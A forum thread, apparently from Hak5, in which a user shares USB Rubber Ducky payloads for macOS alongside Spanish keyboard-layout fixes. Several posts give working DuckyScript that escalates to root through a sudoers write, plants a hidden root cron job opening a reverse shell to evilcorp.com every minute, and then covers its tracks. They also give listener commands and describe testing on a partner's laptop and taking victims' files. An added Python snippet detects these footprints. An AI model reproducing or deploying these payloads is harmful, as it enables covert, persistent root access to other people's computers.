Matto

Posts posted by Matto

  1. Good news!!

    I've been searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.

    Then I found a much better alternative to the payload, one that uses python to create the reverse shell and socat instead of netcat to listen for the connection.

    This is the Ducky payload:

    DELAY 2000
    REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
    COMMAND SPACE
    DELAY 200
    STRING Terminal
    DELAY 200
    ENTER
    DELAY 500
    COMMAND n
    DELAY 300
    REM --------------- ESCALATE PRIVILEGES ---------------
    STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    ENTER
    DELAY 100
    REM --------------- RUN PAYLOAD ---------------
    STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab -
    ENTER
    DELAY 100
    REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
    STRING echo -e '$d\nw\nq'| ed /etc/sudoers
    ENTER
    DELAY 100
    REM --------------- CLOSE TERMINAL ---------------
    STRING exit
    ENTER
    DELAY 100
    COMMAND w
    DELAY 100
    COMMAND q
    

    And in your server, to listen for the connection you have to run:

    sudo socat `tty`,raw,echo=0 tcp-listen:443
    

    NOTE: You most likely don't have socat installed, but you can install it very easily via apt-get (if your server is a Debian-based Linux; I'm not sure if it's available on OS X via Homebrew).

    This method has a longer command to execute and is not as «elegant» as the previous one, but it solves ALL of the problems, and when I say all, I mean that even autocomplete with the TAB key works perfectly. It's just the same behaviour as an SSH connection. You can also press «Ctrl + C» and you won't drop the connection; it's going to send that command to the victim as expected :)

    To exit, just press «Ctrl + D».

    Same as before, it will try to reconnect every 60 seconds.

    I hope this helps. I've tested it and it works like a charm.

  2. Thanks!

    The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.

    Yes, this makes it difficult to find, especially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)

    Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).

    When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano, since when I open any file I can't use the arrows to move around (weird symbols appear instead).

    Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:

    ftp myserver.com
    

    And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.

    Maybe it's a netcat limitation to send some output and special keys (like the arrows) through the connection?

    Do you know any way around this? I know setting up an SSH server on the victim would be the best solution, but then port 22 would have to be open in his router and pointing to his IP address...

    I'm not sure if I'm making myself clear. I'm sorry, English is not my native language :)

    Thanks!

  3. This vulnerability is great!

    I've just created a payload for a persistent reverse bash in OS X using it:

    https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

    About visudo:

    I've been testing a little, and it seems that nothing happens if you directly edit «/etc/sudoers», so what my script does, once the payload has been executed, is just delete the last line of the file like this:

    REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
    STRING echo -e '$d\nw\nq'| ed /etc/sudoers
    ENTER
    DELAY 200
    

    I tested this on my own Mac and it works OK. It's way simpler and faster than using visudo.

    Hope it helps!

  4. Ok, sorry for the delay. I'm back now.

    One thing I forgot to tell you is that I'm using a Mac, so that may change things.

    I've spent a little time fixing the Spanish layout for Mac OS X, and now it works OK.

    This is my Layout:

    // Author: Midnitesnake
    // 01-11-2014
    // LAYOUT_ESPANOL
    // Based from Italian Keymap
    // Thanks to Jaime.AlvarezdeAldecoa for patches
    // Characters fixed by DragsterPS
    // Fixes for Mac by Matto
    
    KEY_NON_US_100 = 100
    
    ASCII_20 = KEY_SPACE
    // 32
    ASCII_21 = KEY_1, MODIFIERKEY_SHIFT
    // 33 !
    ASCII_22 = KEY_2, MODIFIERKEY_SHIFT
    // 34 
    ASCII_23 = KEY_3, MODIFIERKEY_RIGHT_ALT
    // 35 #
    ASCII_24 = KEY_4, MODIFIERKEY_SHIFT
    // 36 $
    ASCII_25 = KEY_5, MODIFIERKEY_SHIFT
    // 37 %
    ASCII_26 = KEY_6, MODIFIERKEY_SHIFT
    // 38 &
    ASCII_27 = KEY_MINUS
    // 39 
    ASCII_28 = KEY_8, MODIFIERKEY_SHIFT
    // 40 (
    ASCII_29 = KEY_9, MODIFIERKEY_SHIFT
    // 41 )
    ASCII_2A = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT
    // 42 *
    ASCII_2B = KEY_RIGHT_BRACE
    // 43 +
    ASCII_2C = KEY_COMMA
    // 44 ,
    ASCII_2D = KEY_SLASH
    // 45 
    ASCII_2E = KEY_PERIOD
    // 46 .
    ASCII_2F = KEY_7, MODIFIERKEY_SHIFT
    // 47 /
    ASCII_30 = KEY_0
    // 48 0
    ASCII_31 = KEY_1
    // 49 1
    ASCII_32 = KEY_2
    // 50 2
    ASCII_33 = KEY_3
    // 51 3
    ASCII_34 = KEY_4
    // 52 4
    ASCII_35 = KEY_5
    // 53 5
    ASCII_36 = KEY_6
    // 54 6
    ASCII_37 = KEY_7
    // 55 7
    ASCII_38 = KEY_8
    // 56 8
    ASCII_39 = KEY_9
    // 57 9
    ASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT
    // 58 :
    ASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT
    // 59 ;
    ASCII_3C = KEY_TILDE
    // 60 <
    ASCII_3D = KEY_0, MODIFIERKEY_SHIFT
    // 61 =
    ASCII_3E = KEY_TILDE, MODIFIERKEY_SHIFT
    // 62 >
    ASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT
    // 63 ?
    ASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT
    // 64 @
    ASCII_41 = KEY_A, MODIFIERKEY_SHIFT
    // 65 A
    ASCII_42 = KEY_B, MODIFIERKEY_SHIFT
    // 66 B
    ASCII_43 = KEY_C, MODIFIERKEY_SHIFT
    // 67 C
    ASCII_44 = KEY_D, MODIFIERKEY_SHIFT
    // 68 D
    ASCII_45 = KEY_E, MODIFIERKEY_SHIFT
    // 69 E
    ASCII_46 = KEY_F, MODIFIERKEY_SHIFT
    // 70 F
    ASCII_47 = KEY_G, MODIFIERKEY_SHIFT
    // 71 G
    ASCII_48 = KEY_H, MODIFIERKEY_SHIFT
    // 72 H
    ASCII_49 = KEY_I, MODIFIERKEY_SHIFT
    // 73 I
    ASCII_4A = KEY_J, MODIFIERKEY_SHIFT
    // 74 J
    ASCII_4B = KEY_K, MODIFIERKEY_SHIFT
    // 75 K
    ASCII_4C = KEY_L, MODIFIERKEY_SHIFT
    // 76 L
    ASCII_4D = KEY_M, MODIFIERKEY_SHIFT
    // 77 M
    ASCII_4E = KEY_N, MODIFIERKEY_SHIFT
    // 78 N
    ASCII_4F = KEY_O, MODIFIERKEY_SHIFT
    // 79 O
    ASCII_50 = KEY_P, MODIFIERKEY_SHIFT
    // 80 P
    ASCII_51 = KEY_Q, MODIFIERKEY_SHIFT
    // 81 Q
    ASCII_52 = KEY_R, MODIFIERKEY_SHIFT
    // 82 R
    ASCII_53 = KEY_S, MODIFIERKEY_SHIFT
    // 83 S
    ASCII_54 = KEY_T, MODIFIERKEY_SHIFT
    // 84 T
    ASCII_55 = KEY_U, MODIFIERKEY_SHIFT
    // 85 U
    ASCII_56 = KEY_V, MODIFIERKEY_SHIFT
    // 86 V
    ASCII_57 = KEY_W, MODIFIERKEY_SHIFT
    // 87 W
    ASCII_58 = KEY_X, MODIFIERKEY_SHIFT
    // 88 X
    ASCII_59 = KEY_Y, MODIFIERKEY_SHIFT
    // 89 Y
    ASCII_5A = KEY_Z, MODIFIERKEY_SHIFT
    // 90 Z
    ASCII_5B = KEY_LEFT_BRACE, MODIFIERKEY_RIGHT_ALT
    // 91 [
    ASCII_5C = KEY_NON_US_100, MODIFIERKEY_RIGHT_ALT
    // 92 \
    
    ASCII_5D = KEY_RIGHT_BRACE, MODIFIERKEY_RIGHT_ALT
    // 93 ]
    ASCII_5E = KEY_EQUAL, MODIFIERKEY_SHIFT
    // 94 ^
    ASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT
    // 95 _
    
    // ascii 60, 96: grave accent, not mapped
    ASCII_61 = KEY_A
    // 97 a
    ASCII_62 = KEY_B
    // 98 b
    ASCII_63 = KEY_C
    // 99 c
    ASCII_64 = KEY_D
    // 100 d
    ASCII_65 = KEY_E
    // 101 e
    ASCII_66 = KEY_F
    // 102 f
    ASCII_67 = KEY_G
    // 103 g
    ASCII_68 = KEY_H
    // 104 h
    ASCII_69 = KEY_I
    // 105 i
    ASCII_6A = KEY_J
    // 106 j
    ASCII_6B = KEY_K
    // 107 k
    ASCII_6C = KEY_L
    // 108 l
    ASCII_6D = KEY_M
    // 109 m
    ASCII_6E = KEY_N
    // 110 n
    ASCII_6F = KEY_O
    // 111 o
    ASCII_70 = KEY_P
    // 112 p
    ASCII_71 = KEY_Q
    // 113 q
    ASCII_72 = KEY_R
    // 114 r
    ASCII_73 = KEY_S
    // 115 s
    ASCII_74 = KEY_T
    // 116 t
    ASCII_75 = KEY_U
    // 117 u
    ASCII_76 = KEY_V
    // 118 v
    ASCII_77 = KEY_W
    // 119 w
    ASCII_78 = KEY_X
    // 120 x
    ASCII_79 = KEY_Y
    // 121 y
    ASCII_7A = KEY_Z
    // 122 z
    ASCII_7B = KEY_QUOTE, MODIFIERKEY_RIGHT_ALT
    // 123 {
    ASCII_7C = KEY_1, MODIFIERKEY_RIGHT_ALT
    // 124 |
    ASCII_7D = KEY_BACKSLASH, MODIFIERKEY_RIGHT_ALT
    // 125 }
    ASCII_7E = KEY_SEMICOLON, MODIFIERKEY_RIGHT_ALT
    // 126 ~
    ISO_8859_1_BA = KEY_NON_US_100
    // 186 º
    
    // ascii 7E, 126: tilde, not mapped
    ISO_8859_1_E0 = KEY_QUOTE
    // 192 a grave
    ISO_8859_1_E8 = KEY_LEFT_BRACE
    // 232 e grave
    ISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT
    // 233 e acute
    ISO_8859_1_EC = KEY_EQUAL
    // 236 i grave
    ISO_8859_1_F2 = KEY_SEMICOLON
    // 242 o grave
    ISO_8859_1_F9 = KEY_BACKSLASH
    // 249 u grave
    
    ISO_8859_1_F1 = KEY_SEMICOLON
    // 241 ñ
    ISO_8859_1_D1 = KEY_SEMICOLON, MODIFIERKEY_SHIFT
    // 209 Ñ
    

    I hope it helps someone!

  5. Hi! I'm new to the Rubber Ducky and to this community.

    I've made a simple payload to create a reverse bash in an OS X target by using crontab.

    I've seen some examples that use complicated generated plist files, and I'm not sure what the advantage is over setting a cron job to recover the session.

    Anyway, this is my payload:

    DELAY 2000
    REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
    COMMAND SPACE
    DELAY 300
    STRING Terminal
    DELAY 300
    ENTER
    DELAY 700
    COMMAND n
    DELAY 500
    REM --------------- ESCALATE PRIVILEGES ---------------
    STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    ENTER
    DELAY 200
    REM --------------- RUN PAYLOAD ---------------
    STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab -
    ENTER
    DELAY 200
    REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
    STRING echo -e '$d\nw\nq'| ed /etc/sudoers
    ENTER
    DELAY 200
    REM --------------- CLOSE TERMINAL ---------------
    STRING exit
    ENTER
    COMMAND Q
    

    What this does is:

    1. Open the terminal
    2. Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
    3. Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
    4. Remove the newly added privileges to the current user in /etc/sudoers
    5. Close the terminal app

    The whole execution takes around 5 seconds.

    So now, all we have to do in our attacking machine is:

    sudo nc -l -p 443
    

    We wait one minute (max) and we're in with root privileges :ph34r:

    Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.

    Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.

    I just tested it on my girlfriend's Macbook Air and it works flawlessly.

    One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi or something like that, I can't. Maybe you guys can point me to some solution to this?

    The same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to reconnect.

    Hope you like it!
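A defender-side check for the two footprints this payload (and the python/socat variant in post 1) leaves behind: an every-minute root cron entry that hands a shell to a network socket, and a NOPASSWD:ALL line in /etc/sudoers. This is an added example, not code from the thread; the crontab and sudoers text it inspects is constructed, and the user name alice is made up.

```python
import re
from typing import List

# Indicators taken from the payloads in this thread: an every-minute cron
# entry whose command hands a shell to a network socket.
EVERY_MINUTE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+")
SHELL_OVER_SOCKET = re.compile(
    r"/dev/tcp/|bash -i|pty\.spawn|socket\.socket|\bnc\b|\bsocat\b")
# The sudoers line the escalation step writes: "<user> ALL=(ALL) NOPASSWD:ALL".
NOPASSWD_ALL = re.compile(r"^\s*(\S+)\s+ALL\s*=\s*\(ALL\)\s+NOPASSWD:\s*ALL\b")


def find_reverse_shell_cron(crontab_text: str) -> List[str]:
    """Return crontab lines that fire every minute and spawn a shell over a socket."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank or comment line
        if EVERY_MINUTE.match(line) and SHELL_OVER_SOCKET.search(line):
            hits.append(line.strip())
    return hits


def find_nopasswd_sudoers(sudoers_text: str) -> List[str]:
    """Return the principals granted passwordless ALL in a sudoers file."""
    return [m.group(1) for m in map(NOPASSWD_ALL.match, sudoers_text.splitlines()) if m]


# Constructed sample input modelled on the thread's payloads (not real host data).
SAMPLE_ROOT_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/periodic daily
* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1
* * * * * python -c "import socket,os,pty; s=socket.socket(); ..." evilcorp.com 443
"""
SAMPLE_SUDOERS = """\
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
alice ALL=(ALL) NOPASSWD:ALL
"""

if __name__ == "__main__":
    # On a live Mac you would feed it the output of `sudo crontab -l` and `sudo cat /etc/sudoers`.
    for hit in find_reverse_shell_cron(SAMPLE_ROOT_CRONTAB):
        print("suspicious cron entry:", hit)
    for who in find_nopasswd_sudoers(SAMPLE_SUDOERS):
        print("passwordless sudo for:", who)
```

Because the payload deletes its own sudoers line a moment after use, the sudoers check only catches the short window between escalation and cleanup; the cron entry is the durable artifact and the one worth alerting on.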

  6. Well, that's a good question :)

    I got my Ducky yesterday and it has the firmware that came with it. I don't know if I have a way to check it, but I will flash the «Twin Duck» firmware today, so I'll try again afterwards.

    I agree that letters with accents don't add much value to scripts, so don't worry. I don't think they're necessary.

    I'll let you know how it went after flashing the new firmware, but it will have to wait until tomorrow because as a newbie in the forum, this is my last allowed post for today :p

    Thanks again!

  7. You rock, man!

    The bad news is that I ran this test using your layout:

    STRING !
    ENTER
    STRING "
    ENTER
    STRING #
    ENTER
    STRING $
    ENTER
    STRING %
    ENTER
    STRING &
    ENTER
    STRING (
    ENTER
    STRING )
    ENTER
    STRING *
    ENTER
    STRING +
    ENTER
    STRING ,
    ENTER
    STRING .
    ENTER
    STRING /
    ENTER
    STRING :
    ENTER
    STRING ;
    ENTER
    STRING <
    ENTER
    STRING =
    ENTER
    STRING >
    ENTER
    STRING ?
    ENTER
    STRING @
    ENTER
    STRING [
    ENTER
    STRING \
    ENTER
    STRING ]
    ENTER
    STRING ^
    ENTER
    STRING _
    ENTER
    STRING {
    ENTER
    STRING |
    ENTER
    STRING }
    ENTER
    STRING ~
    ENTER
    STRING º
    ENTER
    STRING \
    ENTER
    STRING -
    ENTER
    STRING ´
    ENTER
    STRING á
    ENTER
    STRING Á
    ENTER
    STRING é
    ENTER
    STRING É
    ENTER
    STRING í
    ENTER
    STRING Í
    ENTER
    STRING ó
    ENTER
    STRING Ó
    ENTER
    STRING ú
    ENTER
    STRING Ú
    ENTER
    STRING ñ
    ENTER
    STRING Ñ
    ENTER
    

    While compiling I got these errors:

    Hak5 Duck Encoder 2.6.3
    
    Loading File .....		[ OK ]
    Loading Keyboard File .....	[ OK ]
    Loading Language File .....	[ OK ]
    Loading DuckyScript .....	[ OK ]
    Char not found:ISO_8859_1_B4
    Char not found:ISO_8859_1_E1
    Char not found:ISO_8859_1_C1
    Char not found:ISO_8859_1_C9
    Char not found:ISO_8859_1_ED
    Char not found:ISO_8859_1_CD
    Char not found:ISO_8859_1_F3
    Char not found:ISO_8859_1_D3
    Char not found:ISO_8859_1_FA
    Char not found:ISO_8859_1_DA
    Char not found:ISO_8859_1_F1
    Char not found:ISO_8859_1_D1
    DuckyScript Complete.....	[ OK ]
    
    

    (I think it's because of the accents on the vowels and the «ñ»)

    And the output was:

    
    
    !
    "
    #
    $
    %
    &
    (
    )
    *
    +
    ,
    .
    /
    :
    ;
    º
    =
    ª
    ?
    @
    [
    ]
    ¿
    _
    {
    |
    }
    ¢
    <
    -
    -----> Blank space
    -----> Blank space
    -----> Blank space
    ^
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    -----> Blank space
    "

    Am I doing something wrong?
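To see why the encoder reports «Char not found:ISO_8859_1_xx» for exactly these characters, here is an added Python model of its lookup (not the Duck Encoder's own code, and not from the thread): it parses the layout syntax posted in this thread and names the entries a STRING would need. The layout excerpt is a constructed subset of the Spanish-for-Mac layout from post 4, so the per-character results apply to that layout, not to the one used when the errors above were produced.

```python
import re
from typing import Dict, List, Tuple

ASSIGN = re.compile(r"^\s*([A-Z0-9_]+)\s*=\s*(.+?)\s*$")

def parse_layout(text: str) -> Dict[str, Tuple[str, ...]]:
    """Map each ASCII_xx / ISO_8859_1_xx entry to its (key, modifier, ...) tuple.
    '//' comments, blank lines and key-code definitions (KEY_NON_US_100 = 100) are skipped."""
    table = {}
    for line in text.splitlines():
        m = ASSIGN.match(line.split("//", 1)[0])
        if m and m.group(1).startswith(("ASCII_", "ISO_8859_1_")):
            table[m.group(1)] = tuple(p.strip() for p in m.group(2).split(","))
    return table

def encoder_name(ch: str) -> str:
    """Entry name looked up for one character, as printed after 'Char not found:'."""
    code = ord(ch)
    if code < 0x80:
        return "ASCII_%02X" % code
    if code < 0x100:
        return "ISO_8859_1_%02X" % code
    raise ValueError("not representable in Latin-1: %r" % ch)

def missing_chars(layout: Dict[str, Tuple[str, ...]], text: str) -> List[str]:
    """Entries a STRING would need that the layout does not define, in first-seen order."""
    missing: List[str] = []
    for ch in text:
        name = encoder_name(ch)
        if name not in layout and name not in missing:
            missing.append(name)
    return missing

def keystrokes(layout: Dict[str, Tuple[str, ...]], text: str) -> List[Tuple[str, ...]]:
    """Key/modifier tuple pressed for each character of text (KeyError if unmapped)."""
    return [layout[encoder_name(ch)] for ch in text]

# Constructed excerpt of the Spanish-for-Mac layout posted in this thread.
LAYOUT_EXCERPT = """\
KEY_NON_US_100 = 100
ASCII_21 = KEY_1, MODIFIERKEY_SHIFT
// 33 !
ASCII_61 = KEY_A
// 97 a
ISO_8859_1_E9 = KEY_LEFT_BRACE, MODIFIERKEY_SHIFT
// 233 e acute
ISO_8859_1_F1 = KEY_SEMICOLON
ISO_8859_1_D1 = KEY_SEMICOLON, MODIFIERKEY_SHIFT
"""
```

Running missing_chars over the test STRINGs above against the full layout reproduces the encoder's list: the acute accent (B4), the accented capitals (C1, C9, CD, D3, DA) and the accented vowels the layout never defines, while é (E9) and, with the later fix, ñ/Ñ (F1/D1) resolve.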
